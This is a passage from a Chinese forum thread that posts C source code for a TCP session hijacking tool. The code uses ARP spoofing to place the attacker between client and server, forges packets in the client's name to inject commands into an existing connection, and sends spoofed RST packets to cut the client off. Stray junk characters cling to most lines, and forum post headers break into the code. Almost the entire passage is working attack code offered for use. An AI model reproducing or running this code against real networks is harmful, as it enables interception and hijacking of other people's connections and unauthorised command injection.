' H5 i5 z  J* G9 N. C        else return pTmp-&gt;ident; 0 v2 s& f/ S8 g8 w5 n$ }# F6 P
      } 1 x% L! ]* ~1 I' h5 L+ ^
    }
; u. |) d3 M6 e. C8 A# T$ c2 D    pTmp = pTmp-&gt;Next;
7 H- P7 a. o: X* B  d3 ~  } ; b+ d4 ^+ F. O6 ~! }
  //not found, create new node ' g% s, `3 C4 L% }: e
  if( (!pTmp) &amp;&amp; (!bDelete) &amp;&amp; (bAddNew) ) 4 h6 t9 [1 @" F; E: G) p
  { 4 W5 ?0 \  W& S7 [2 t% o
    //search unactive note ' E* F- x; h' {' `/ P
    pTmp = g_pConnHead;
1 I* J) |' s& ~6 I4 Z5 I/ V% k; Q    while(pTmp)
5 Y2 d2 ^' G- s6 b) C1 ^6 h' q    {
' Y: H3 Q1 ]: L9 }! }9 L9 D/ {0 U      if(!pTmp-&gt;bActive) break; ! g" F% y3 H1 \5 e) j4 I
      pTmp = pTmp-&gt;Next;
! r) T' f0 k2 `0 }: |6 t    } , {% V  E4 |2 F& I; n
    //found a unactive node
8 s8 t! M" E4 X: @5 ?$ b    if(pTmp)
* p" V& z9 ]- M2 f) `4 K4 ?    { / t% i( d1 S) j1 B6 V" {3 S
      pTmp-&gt;dwServerIP = dwServerIP;
' m4 J& r, V6 M      pTmp-&gt;uServerPort = uServerPort; 9 c8 N7 z2 E" Y4 P9 G
      pTmp-&gt;dwClientIP = dwClientIP; , w% f4 L: }% T2 [0 S
      pTmp-&gt;uClientPort = uClientPort;
4 U# H$ B5 w6 G3 C( l6 B/ x8 d      pTmp-&gt;bActive = TRUE;
# k  r: v$ Z: p' `( a      return pTmp-&gt;ident; * s) ^7 r% a4 ?- U9 T4 f% k0 j
    } 4 E7 }" {" G! M; K7 G7 D2 ]
    //not found,create new node 3 \; R# F8 R; n9 g) P7 Y& J0 G
    pNew = (PCONNINFO)malloc(sizeof(CONNINFO));
# _; Q% k  S2 U4 k    if(!pNew) ! A6 ?! V' K$ I) p3 D5 w$ Q" A
    { 7 t* O+ \' s. l7 I" ?# [, Z
      printf("malloc for link node error:%d\n", GetLastError()); + }! X8 t2 G# z* P9 q0 q1 B
      return 0; # E% X& ~1 q$ C6 n) Z4 W
    }
" o; J# O% Z, t. D3 q/ L# g    //fill the struct
' l9 c4 v9 k) X3 z* {4 C  P    pNew-&gt;bActive = TRUE;
. G" _- c3 H) ^9 J    pNew-&gt;dwServerIP = dwServerIP; ) y0 q6 W& @' e1 K8 D9 m, H
    pNew-&gt;uServerPort = uServerPort; ' G0 o. r% Z( W2 q: B4 u& \
    pNew-&gt;dwClientIP = dwClientIP;
; Z; x- j5 K/ U- z& `( h* R    pNew-&gt;uClientPort = uClientPort;
7 M5 o- M. o1 n    pNew-&gt;ident = ++g_ident; ' G5 m% O6 Q3 n' ?1 n
    pNew-&gt;Next = NULL;
7 o; b/ E9 A/ D5 f3 g) P    //add new node to link % V. w1 a' a* U: ~6 U, |
    if(!g_pConnHead)
" n/ Y  [  ^. M% x" [      g_pConnHead = g_pConnLast = pNew; 7 z) W, ]$ i+ d: X/ F
    else 1 y, e3 J$ e2 J$ l
    { + ~3 k* t3 {  F- r
      g_pConnLast-&gt;Next = pNew;
+ U3 M8 C9 |! b. F6 z; }( f: J/ @4 H      g_pConnLast = pNew; + ~5 m8 S* v& S; o* {
    }
9 J6 l# ]: w7 @+ Y* r    return pNew-&gt;ident; ; f4 L0 P& i1 a) x4 U9 G; A) j
  }
; s5 f, I; R- e8 y" a$ \  return 0; ' V  I* l3 t% X% t. N
} + t9 g3 P* Z: x% l3 Q

9 D, a! h6 ?7 M0 t- m) d//
5 b, K* s$ z" S5 P//功能:判断一个数据包是不是只有ACK标志
$ t, x# H6 o- N$ T// 8 \& k( p% Q6 ~4 {9 o% _
BOOL IsACKPacket(unsigned char flag)
8 p1 a( ~3 g( k9 b9 ]{ " K- K- G) E- G% v
  int  i, j=1;
3 p- {8 x% Z0 L# X0 s  for(i=0 ; i&lt;4; i++)
+ r4 E+ j4 @8 r. P9 h% q  { ' b& z. ?0 j9 P- D# n
    if(flag &amp; j) return FALSE; 3 L& v% u: z* n
    j &lt;&lt;= 1;
) B' z# p5 A$ [/ D) Z" g! s  } + J/ I/ r+ Y0 l7 D  j( G0 W7 v% q
  if(!(flag &amp; 0x10)) return FALSE;//is ack?
$ m4 d1 X: I6 W. y3 P  if(flag &amp; 0x20) return FALSE;
& k  Q1 @& {% R  return TRUE; , \; W& Z' `' {/ H6 q9 K1 m# K
}
: r+ x/ l1 n+ B% M0 o
( `! L% d$ @  a# t$ ~% ^// 2 ^1 z. a* I% [) ?
//功能:伪装成Client给Server发送数据包 2 N! q6 X2 e% g
//
5 }- F5 E" q! ]! a! @4 ^& _BOOL SendHiJackPacket(PTCPPACKET pTempletPacket)
" s' l! D1 v9 _/ D5 {0 h{
' s  O' ]! H& h& |7 O7 P+ Z9 c& N, O4 T* w) k4 t. \6 m5 |
  char    szBuff[1520]; 7 b+ V; G: U: g) Y2 N" K  v9 @$ t
  PSDHDR    psdhdr;
5 S0 i; i" V" j6 U  PTCPPACKET  pHiJackPacket = NULL;
& S& i: |  R. ]7 _  BOOL    bRet = FALSE; 1 g+ G; i  D+ `' V$ l2 t
# t  l8 G) V3 y
  __try
' {) j- L# I# u! d* \  { , ~0 i0 U: [8 A7 _
    //
# ^+ M+ C" y: ?: |' r    if(!g_pCurrCtrlConn) __leave; 7 e9 C- B% ~) x( I; o( @5 j
    //allocate memory for hijack packet
- s8 I& c0 G& n- y( ?    pHiJackPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET));
* o/ e0 f2 S! G) Y5 H; X% u. M    if(!pHiJackPacket)
1 R0 V# }; E4 o8 z. e: G; t    { 2 q3 k, @& U4 H0 F! k, K, x, A
      printf("malloc error:%d\n", GetLastError());
1 {( ?; t* y0 C$ V$ Z      __leave;
+ ?- ~% g7 q2 X8 g    }
8 o% h6 h" J& H    memcpy(pHiJackPacket, pTempletPacket, sizeof(TCPPACKET));
7 ^2 z" P/ u) ?    //-------------- modify the packet ---------------// . Q& V% |2 ]. L1 ]
    //modify ethernet head
; V  s. a* }( E0 {% Z  F    memcpy(pHiJackPacket-&gt;ehhdr.DestMAC, g_szServerSideMAC, 6);
0 W6 }/ l$ a4 ?    memcpy(pHiJackPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6);
' {/ h# s) ^' |1 k2 ?% n    //modify ip head 3 B4 e) c( l( m, b$ m% L/ m  [
    pHiJackPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long)); : d3 I3 G% p" }$ c
    pHiJackPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)+strlen(g_szCommand));
8 f6 _' A/ L; J4 l2 U9 h8 [9 y* F0 `# Y    pHiJackPacket-&gt;iphdr.ident += 1;//标识加1 " R& I( N4 |6 {8 N
    pHiJackPacket-&gt;iphdr.checksum = 0; * {1 F8 ~- Q# r, P3 e
    pHiJackPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwClientIP;//源IP地址,伪装成client
& p& }- w$ v% Z1 P    pHiJackPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwServerIP;//目的IP地址,接收hijack包的地址 0 ]5 Q5 k8 t+ S
    //modify tcp head
4 p( d% ?6 N" M) }- ^: `    pHiJackPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uClientPort;//client's port
" t3 x! B1 {' i5 S$ H) D- }8 b: |    pHiJackPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uServerPort;//server's port 8 q! B5 t1 C6 p$ j' b  j- m0 G  T0 \' \4 A
    pHiJackPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4 &lt;&lt; 4 | 0);
: I: E5 D, w! b* i4 b$ Y    pHiJackPacket-&gt;tcphdr.th_flag = 0x18;// PA
1 ]/ C1 i) ~1 B    pHiJackPacket-&gt;tcphdr.th_sum = 0;
) G9 e+ I% w& t) T5 Z/ G) I    pHiJackPacket-&gt;tcphdr.th_win = 0x3F44;
! l" o& D+ f3 `& I, M5 a, `    //fill tcp psd head % @* b5 D! U4 }# V/ c
    psdhdr.saddr = pHiJackPacket-&gt;iphdr.sourceIP;           
+ U" P& D- D, B4 ^2 P4 ~5 I. r    psdhdr.daddr = pHiJackPacket-&gt;iphdr.destIP;           , ]9 E7 a) Y# S0 W! d9 |' I* {
    psdhdr.mbz = 0; , ]3 }/ e7 P$ m; P. A9 s! \/ q: o
    psdhdr.ptcl = IPPROTO_TCP; # S, r6 }( i  N/ ?+ e
    psdhdr.tcpl = htons(sizeof(TCPHDR) + strlen(g_szCommand));//tcp head + data len & m; n: E+ j  \1 ?: `
    //calculate tcp checksum     
9 g3 J; F7 D8 W! g2 Q% x    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
! V( r; \& t- U$ l" K( h2 O  h    memcpy(szBuff + sizeof(PSDHDR), &amp;pHiJackPacket-&gt;tcphdr, sizeof(TCPHDR));
; k' w( V: R6 ~    memcpy(szBuff + sizeof(PSDHDR) + sizeof(TCPHDR), g_szCommand, strlen(g_szCommand));
( a. d! Q, R9 Y- ^! j% w) C% B' K& J% [    pHiJackPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR) + strlen(g_szCommand));
4 p& ~) b) ~/ O/ a    //calculate IP checksum , H0 c! r  |  s
    pHiJackPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pHiJackPacket-&gt;iphdr, sizeof(IPHDR));
$ S/ x0 e, R; t+ y    //fill send buffer           ) ?% H. U: I0 h% f
    memcpy(szBuff, (char *)pHiJackPacket, sizeof(TCPPACKET)); # n- q$ o' Q. q' C# l
    memcpy(szBuff + sizeof(TCPPACKET), g_szCommand, strlen(g_szCommand)); 6 H" f) x5 \! x4 [, l
    memset(szBuff + sizeof(TCPPACKET) + strlen(g_szCommand), 0, 4); " l1 y. S! N/ j/ v8 ~! |! e
    memset(g_lpSendPacket-&gt;Buffer, 0, 1514); ; B& a2 ^/ B2 `0 y% b
    memcpy(g_lpSendPacket-&gt;Buffer, szBuff, sizeof(TCPPACKET) + strlen(g_szCommand));
6 i  ?$ f. j5 h) Y. F    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE) ; a# C7 x8 b: t+ X
    { 5 ~# T, g% w9 Z9 G$ C. d# }
      printf("Error sending the hijack packets!\n"); 2 p  k, `6 P( @) r5 V$ t6 b
      __leave; * l9 C5 l& R( T0 j% ^1 x
    } " N& C1 X5 j% c  |/ r0 s
    else printf("Send hijack packet ok!\n"); 8 m( U" E7 F( O2 n3 H- u+ q7 F
    bRet = TRUE; + W# d+ G( U  m. h+ F
  }
作者: 韩冰    时间: 2004-11-21 01:47
__finally 3 c8 }' Y+ X# g* a
  { ( O8 z0 n) }5 ^0 R6 T: t& a
    if(pHiJackPacket) free(pHiJackPacket);   x+ V3 ^& [! H$ z$ D
  } , Q5 l$ D6 {4 _( W: @' s" X
  return bRet; 4 U* E& S* r+ ^
}
# T9 W& Y0 m1 e1 |4 X* m- `6 \
9 l' T  B7 u& p0 \: D, B
* l; _/ e$ S. F. h; N5 P// 5 t# p# V  z/ G! R1 D' }
//功能:伪装成Server给Client发送rst包 6 o) s$ o- k+ y
// " e8 j  O: A9 j) w+ v
BOOL SendRstPacket(unsigned int seq, unsigned int ack)
# @; ?2 f% @2 x2 _{
; z6 N0 @$ h; E4 i  _  char    szBuff[60]; ! ?4 G5 T& e( n* [* f, h& b# }2 u) w
  PSDHDR    psdhdr;
( o# j# Z# I& |" _0 d/ f  PTCPPACKET  pTcpPacket = NULL;
. p) Y7 m" |1 `5 E" E5 k# a- P  BOOL    bRet = FALSE; 9 _# V) }: w1 `3 ^; W2 E) S

/ p* a; ^% I+ T# c2 H  __try & z. o$ P5 \9 I( J
  {
, V9 }4 _  X" s9 x7 z  L1 T8 a    //检查当前指向想控制的连接的信息的指针是否为空 & ^( v- l! G" E/ f) z4 b
    if(!g_pCurrCtrlConn) __leave;
# B) e- n! t5 e4 L    //allocate memory for rst packet * G7 o, k' Q( R8 k! ]
    pTcpPacket = (PTCPPACKET)malloc(sizeof(TCPPACKET)); 7 m$ {. t+ J7 c( ^8 S7 P2 R
    if(!pTcpPacket) : c& [- b4 W/ R1 D7 V: a5 G- i
    {
6 G& x9 w" P: y  v      printf("malloc error:%d\n", GetLastError());
$ q8 O! f: |6 o& d, O& W      __leave;
7 x( K2 R/ |! `; b. v" `! u& j3 @9 F    }
& _; X  E5 L% E7 o2 L" ]3 r    //fill ethernet head 6 T( \( y9 o! y) v
    memcpy(pTcpPacket-&gt;ehhdr.DestMAC, g_szClientSideMAC, 6);
. R% z& S+ n7 z  I8 r, I9 w    memcpy(pTcpPacket-&gt;ehhdr.SourceMAC, g_szOwnMAC, 6); * E" l* @1 _( c: f: @4 C
    pTcpPacket-&gt;ehhdr.EthernetType = htons(EPT_IP);
. L: o. u4 t4 Y' w2 H5 L% s8 F    //fil ip head 5 g4 W5 w( j9 x' w* Q) x% c. \
    pTcpPacket-&gt;iphdr.h_verlen = (4&lt;&lt;4 | sizeof(IPHDR)/sizeof(unsigned long));
; c. J3 o8 r0 Z2 y9 p/ a7 u    pTcpPacket-&gt;iphdr.tos = 0; $ a5 `: Q% \( A3 m
    pTcpPacket-&gt;iphdr.total_len = htons(sizeof(IPHDR)+sizeof(TCPHDR)); ) ]/ v+ o# v. c  u+ g/ v, J/ n, g
    pTcpPacket-&gt;iphdr.ident = 1; % s' j! a/ z: j) @  p/ Q
    pTcpPacket-&gt;iphdr.frag_and_flags = 0; ! c8 `. u" Y8 q3 C
    pTcpPacket-&gt;iphdr.ttl = 128;
& n, f' k  @" {( r% e* [    pTcpPacket-&gt;iphdr.proto = IPPROTO_TCP; * c- j7 C0 V  U1 t* w2 S; g
    pTcpPacket-&gt;iphdr.checksum = 0; ! v7 s. u; O( D" m+ v
    pTcpPacket-&gt;iphdr.sourceIP = g_pCurrCtrlConn-&gt;dwServerIP;//源IP地址,伪装成服务器的
: s. a  e8 G' e& I    pTcpPacket-&gt;iphdr.destIP = g_pCurrCtrlConn-&gt;dwClientIP;//接收此rst包的ip地址
! p( Q2 ?* I. h' o5 e! e    //fill tcp head
$ C, D) }' K: S) X$ ~( q    pTcpPacket-&gt;tcphdr.th_sport = g_pCurrCtrlConn-&gt;uServerPort;//源端口号,伪装成服务器的端口
# a; f) V. O) f% Z) R' t    pTcpPacket-&gt;tcphdr.th_dport = g_pCurrCtrlConn-&gt;uClientPort;//接收此rst包的端口 / q1 |  C+ ?! s- {+ s) M( c
    pTcpPacket-&gt;tcphdr.th_seq = seq;//SYN
8 P2 b  I* h% \, W3 G1 i    pTcpPacket-&gt;tcphdr.th_ack = ack;//ACK 3 }: r1 \5 P1 h$ }# `) F* {: ?  n
    pTcpPacket-&gt;tcphdr.th_lenres = (sizeof(TCPHDR)/4&lt;&lt;4|0);
! t+ I' G. U* Z& ^2 K) @0 U    pTcpPacket-&gt;tcphdr.th_flag = 4;//RST flag
0 ~& y& Z# {! \- S: |    pTcpPacket-&gt;tcphdr.th_win = 0; 0 N- i3 G% q3 j5 |3 T7 c! e
    pTcpPacket-&gt;tcphdr.th_urp = 0;
% k; Q  N1 e) A" m    pTcpPacket-&gt;tcphdr.th_sum = 0; * Z3 D# \0 F, J3 d" L* d
    //fill tcp psd head
, r/ e; g4 m0 ^/ t5 ^9 J; M    psdhdr.saddr = pTcpPacket-&gt;iphdr.sourceIP;           ' z- _4 ~  k( X
    psdhdr.daddr = pTcpPacket-&gt;iphdr.destIP;           $ ]/ b  ~! P4 _4 M+ b
    psdhdr.mbz = 0;
: u: z- F4 U* `5 ]    psdhdr.ptcl = IPPROTO_TCP; ' `/ Q4 _* U. D; @
    psdhdr.tcpl = htons(sizeof(TCPHDR));
( j5 y5 q! k; c) w: s    //calculate tcp checksum     
3 ]2 o8 }. U2 `" f0 O) s    memcpy(szBuff, &amp;psdhdr, sizeof(PSDHDR));   
1 B& D: P' ?" c2 `7 \    memcpy(szBuff + sizeof(PSDHDR), &amp;pTcpPacket-&gt;tcphdr, sizeof(TCPHDR)); 8 Y' G' R7 p  m2 g/ n9 v
    pTcpPacket-&gt;tcphdr.th_sum = checksum((USHORT *)szBuff, sizeof(PSDHDR) + sizeof(TCPHDR)); 8 P" |0 [! U: F" A
    //calculate IP checksum
, I4 K# X; p! S1 O5 K$ Q7 f    pTcpPacket-&gt;iphdr.checksum = checksum((USHORT *)&amp;pTcpPacket-&gt;iphdr, sizeof(IPHDR)); 0 Q' E- r% C3 Q8 J/ s
    //fill send buffer
! P2 u! ]5 i% U& r# `3 O- e* {    memset(g_lpSendPacket-&gt;Buffer, 0, 1514);
6 ]% w) I7 ^$ N    memcpy(g_lpSendPacket-&gt;Buffer, (char *)pTcpPacket, sizeof(TCPPACKET)); 0 M! f$ u; g- U9 [
    if(PacketSendPacket(g_lpAdapter, g_lpSendPacket, TRUE) == FALSE) ' v8 H& D' S; g6 d
    { , u% @* p9 E( y2 u1 s* a
      printf("Error sending the rst packets!\n");
) V+ H3 m5 }+ T" t! s9 S) T3 Q" ^      __leave; 9 v% I7 [) o0 x3 e8 r
    }
+ x8 u$ d/ r  ]    else printf("Send RST packet ok!\n");
1 E4 ?4 U: v0 Z  ~4 W1 C4 g" ?    bRet = TRUE; 2 N' m# A( D' y6 c) k) m0 k
  } 5 X1 I0 {3 G6 k1 o3 T) t4 h0 d' q
  __finally
! H$ `9 X8 M5 e: Q$ S4 P  {
, {* {' M* S: o$ ]0 X  b    if(pTcpPacket) free(pTcpPacket); / _* p6 A9 q% @; @1 L) b' V
  }
. N$ o* J& b/ y  f* Z% X  return bRet; 8 q7 B" n* C; @" n' D* ^
}
3 E* Y8 ~' e" g& n% p: m6 e- \3 a' ?! j! S$ i8 q( h- j6 R
//
$ J8 u' \' D; F3 q5 n9 ~( j' M//功能:计算校验和 * l8 s- a& Z9 L* S  g0 I
// ; J* b: i) R8 i+ [% F9 H
USHORT checksum(USHORT *buffer, int size)   n4 g" U0 T: r% x& d9 F' X/ Z
{ 1 i) p# @+ W7 w& F; [3 s" }
unsigned long cksum=0;
, B' _% n9 r* a' b7 ] while(size &gt;1) { % Z  l, n2 l; S- N- q. O+ e: E
  cksum+=*buffer++; * V% P" J$ c  P9 n0 q  d/ |) R
  size -=sizeof(USHORT); 2 y* s  i- ~) {1 j
} ' A: V6 g7 n- m) p" `0 `+ O0 A
if(size ) {
% Q) b) e6 D+ E  cksum += *(UCHAR*)buffer;
4 y  J' H+ `6 {* w6 \ } 5 U& V- P9 z6 q9 `
cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);
/ v5 _1 M5 ?% r( t0 q( m$ G! U8 w$ L cksum += (cksum &gt;&gt;16); 0 C4 \) M2 K  N
return (USHORT)(~cksum);
& E0 w7 L. g) [}
6 F2 y3 }5 \* r- w1 f4 l; d" u7 m+ J0 @# _' {( F6 U0 U% Y
//
9 V. `. w- N( k( r4 l//功能:实施ARP欺骗
! k  c, l( ~3 O1 _//1 告诉ServerSide,ClientSide的mac是ownmac
* Y9 H8 J7 j& }: m. T$ v//2 告诉ClientSide,ServerSide的mac是ownmac + n5 {, g$ [: a1 }# W2 W. @: A
//
4 v# [; A4 E! f1 B. O- |DWORD WINAPI ArpSpoofThread(LPVOID lpType) ' v4 I1 \* V4 H" c
{
) @# N1 A' A* j5 p  int  iType = *(int *)lpType;
$ I: s' j8 z/ N7 R  ARPPACKET  ArpPacket;
1 U5 b3 ^& {" O# b5 L  LPPACKET  lpArpPacket;
7 c9 T4 O' g% M( K0 h- R) z/ ]  char    szArpBuff[60]; 8 a7 V& @- r/ u4 L! b" d9 X2 M

& c! ?  e* ]8 d% P. A  switch(iType)
' {/ C1 [: Q9 a; N  { 6 V: i5 F- A5 \- h) i. i/ C# ~( d2 K
    case 1:
- k$ y  J) Z5 I5 g* ?      memcpy(ArpPacket.ehhdr.DestMAC, g_szServerSideMAC, 6);
% a' E$ G, g- H. ?* n      ArpPacket.arphdr.DestIP = g_ServerSideIP; . h  v  L$ Q* J8 ~. J0 _3 Q: t
      ArpPacket.arphdr.SourceIP = g_ClientSideIP; 0 i( a- W9 f( H3 f  Q" c" r
      break; 5 {! ~  F3 @- ~* t2 q1 c6 C
    case 2: % F  ~3 A" x; M0 b+ ]
      memcpy(ArpPacket.ehhdr.DestMAC, g_szClientSideMAC, 6); 5 ~+ ~4 M3 h9 x. i
      ArpPacket.arphdr.DestIP = g_ClientSideIP; , l- A8 K/ e9 s2 i5 A* {0 f5 `
      ArpPacket.arphdr.SourceIP = g_ServerSideIP;
4 K/ w' [6 S4 \8 \! }( y# Y, j      break; 7 P4 M% P1 n8 [
    default: % J: ~- I% }6 n4 Y* C
      return 0;
- c7 M) a5 V/ q* h- g% Q" z! O8 q  }
& [/ f8 v% v. n7 G  //ethernet head   i: ^9 ]. }- K9 }; v3 ]9 ^7 m; o
  memcpy(ArpPacket.ehhdr.SourceMAC, g_szOwnMAC, 6); 9 Y5 U1 L2 k- N8 g. G! N9 o6 Y! K
  ArpPacket.ehhdr.EthernetType = htons(EPT_ARP);//ethernet type
5 x( R; z* @2 H8 n$ I+ g  //arp head " N) ^) u: Y5 U* _
  memcpy(ArpPacket.arphdr.DestMAC, ArpPacket.ehhdr.DestMAC, 6);//dest's mac
  l6 D: \* f  N/ x8 a- T* s, y7 A  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
5 l6 \/ V$ v# f5 S* g, B+ D3 {% {  ArpPacket.arphdr.HrdAddrlen = 6; / b. h+ i% q; M- x
  ArpPacket.arphdr.ProAddrLen = 4;
  q. {! {2 `- }9 `$ @5 t7 I/ m. R3 a% b  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE); , P+ I" F5 f; `, G5 v
  ArpPacket.arphdr.ProType = htons(EPT_IP); 8 \0 H  T+ q' @
  ArpPacket.arphdr.op = htons(2);//arp reply
3 U/ v  m0 `# j( H6 @" r5 y3 a0 I2 j' F- `3 I. [0 ]5 P2 m
  lpArpPacket = PacketAllocatePacket();
+ A' P1 n4 ^: ?1 z. @  if(lpArpPacket == NULL)
* _% I& z  c) A6 I  { 1 Q1 ]; u% e6 H% C. |' @* i: i
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
7 l$ v5 ~" L6 ^; N& w0 g    return 0;
6 J# a, z' @' d  }
4 X: m3 |' u- X& _8 x4 K  memset(szArpBuff, 0, sizeof(szArpBuff)); , Q# @1 E+ K6 V8 h9 {5 T3 }
  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET)); ' U1 {3 D6 {+ F
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
9 i* t, d6 ~* g  //send arp packet : F) j  h# v- S( ~8 |+ R! A
  while(1) 5 k& j) J) `# ~( B2 d3 E
  { . b( w& t6 B4 h+ B% j# J0 L" r# ]
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
6 j3 s8 B: M8 d; j% s& E' r    { : P; A0 `, H% Y, L$ u* g
      printf("Error sending the arp spoof packets!\n");
' E  N) q% x8 l, A( k      return 0; - y* x& W5 k" `* ^) i$ D
    }
# n7 g$ E7 w; g1 U( p+ g    Sleep(1000); 2 m6 a% F+ M$ a. j+ v
  }
1 w8 F! }8 F1 T2 E  return 0; 5 z; f8 Z  ]% `) v2 I
}
8 l9 t, ]+ N/ D9 g5 V  ?6 e2 M, @: J
// # U9 v! T0 k0 M3 Y( D1 e* f6 [
//功能:输入IP取得对应的MAC地址
+ w+ ^& z3 ^- N6 E// # u# z8 ?* E8 g2 C$ V' e
BOOL GetMACAddr(DWORD DestIP, char *pMAC)
" U9 Z; j  C! P& Z! `{
2 X$ |/ Z) ?, t' O; B* U; W& W  DWORD  dwRet; + f$ H8 }5 H# w# {6 N$ C
  ULONG  ulLen = 6, pulMac[2];
$ C3 K6 ?/ S7 v; O  T# x' p  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
1 E; j, o1 p, T5 S  if(dwRet == NO_ERROR) 4 C" n: C" b9 M1 f4 i
  {
2 {+ B% A9 a- Q/ Y1 e" l' |- [) a) E# b    memcpy(pMAC, pulMac, 6);
7 a( B$ O  d' V& u    return TRUE;
4 t2 y. n2 C0 y& c  }
$ `+ m+ J4 u  G% {2 t$ w  else return FALSE;
( W+ F) A) n$ o* \5 c}
作者: wy617958197    时间: 2014-9-4 20:48
大侠好厉害啊




欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5